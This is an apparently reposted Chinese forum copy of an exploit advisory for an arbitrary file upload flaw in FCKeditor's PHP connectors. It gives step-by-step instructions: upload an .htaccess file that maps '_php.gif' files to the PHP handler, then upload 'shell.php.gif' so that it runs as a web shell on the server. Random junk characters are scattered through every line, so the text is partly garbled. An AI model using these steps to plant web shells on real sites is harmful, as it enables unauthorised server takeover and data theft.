FCKeditor所有php版本Upload上传漏洞
$ S, r( r( P" \作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:075 ~- B4 J* I U. H
减小字体 增大字体
- E; e! Z6 v( L/ K8 e; R[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
3 A: i1 Q* K* k9 M8 @[+] Date: 20111 n% Q9 g# h" i! [" ]6 _ }
[+] Author : sinesafe.cn% o: M/ k8 K5 g9 a* Z
[+] Website : WwW.sinesafe.cn* x( N, {9 j. ?1 R3 \( w5 B6 `% n
———————————————————6 n# t) T9 _( y. q, X. C
1.create a htaccess file:* B$ z( z) r, c/ Z; A; S5 h
code:& o: k7 X( r( L8 e: V2 }! }0 j
<FilesMatch “_php.gif”>, P9 k# B$ n0 m4 E$ I
SetHandler application/x-httpd-php4 t( D5 k T# _& X
</FilesMatch>
3 S' W2 R M. Z; P; K i* K8 z& c) t& Q8 `; z+ I
2.Now upload this htaccess with FCKeditor.
+ m" @6 l' e4 ?# |( I/ P, @
/ Q% O' I( Q e1 k& D {2 `http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
# w4 j5 l% a+ @9 O
; u9 M. f Z$ v" t) Yhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html
) a% R6 c( C2 u: l
* A: @0 g8 }1 @5 m6 Z5 q3 }———————————————————————————————-
; E4 X" g- h& d5 d3.Now upload shell.php.gif with FCKeditor.1 X8 D, \. {, y& C6 t: w3 V
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
4 y3 y) ?+ [) M( a5.http://www.sinesafe.cn/anything/shell_php.gif
5 r7 p/ s7 {( a' f$ Q6.Now shell is available from server. |
" ?. k" v% X6 V' _
) c& A3 O+ G: U$ n& a# y% n# B1 p+ \$ D: D0 l5 J- |$ y
|
发表于 2013-10-27 17:25:21
收藏
支持
反对